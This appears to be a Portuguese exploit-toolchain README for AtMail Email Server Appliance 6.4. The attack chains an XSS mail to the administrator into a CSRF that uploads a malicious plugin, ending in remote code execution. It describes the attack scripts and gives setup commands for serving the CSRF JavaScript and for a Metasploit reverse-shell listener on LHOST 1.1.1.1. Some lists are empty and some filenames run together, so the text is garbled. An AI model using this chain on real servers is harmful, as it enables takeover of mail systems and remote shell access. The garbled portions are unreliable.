
AtMail Email Server Appliance 6.4 - Cadeia de exploits (XSS > CSRF > RCE)
[PacketStorm] [WLB-2020080010]
Aviso: este toolchain de exploit foi inspirado por EDB-ID 20009.
O objetivo deste toolchain de exploit é substituir o EDB-ID 20009.
Vantagens deste toolchain sobre o exploit EDB-ID 20009:
Desvantagens do exploit EDB-ID 20009:
msfvenomInstale os requisitos no ArchLinux:
$ sudo pacman -S metasploit tar ruby
Arquivos do exploit:
config.yml contém a configuração do toolchainexploit.sh é o wrapper do exploit que precisa ser executadoxss_mail.rb enviará o e-mail contendo o XSS ao administrador via servidor SMTP do Atmail (sem autenticação).csrf_prepare.rb preparará o payload CSRF (definindo o alvo e codificando o arquivo do plugin)rce_prepare.rb preparará o RCE (gerando o reverse shell e criando o arquivo do plugin)csrf_plugin.js é o payload CSRF preparadonoraj/ contém a arquitetura do plugin descompactadoO toolchain de exploit requer apenas 2 etapas manuais:
config.ymlexploit.shMas antes de lançar o ataque, um servidor web precisa entregar o arquivo JavaScript CSRF e um listener de reverse shell precisa estar aguardando a conexão. Então o ataque ficará mais ou menos assim:
config.ymlcsrf_plugin.jsexploit.shExemplo de servidor HTTP em uma linha:
$ ruby -run -e httpd . -p 8000
Exemplo de listener de reverse shell:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/reverse_php
payload => php/reverse_php
msf5 exploit(multi/handler) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf5 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/handler) > run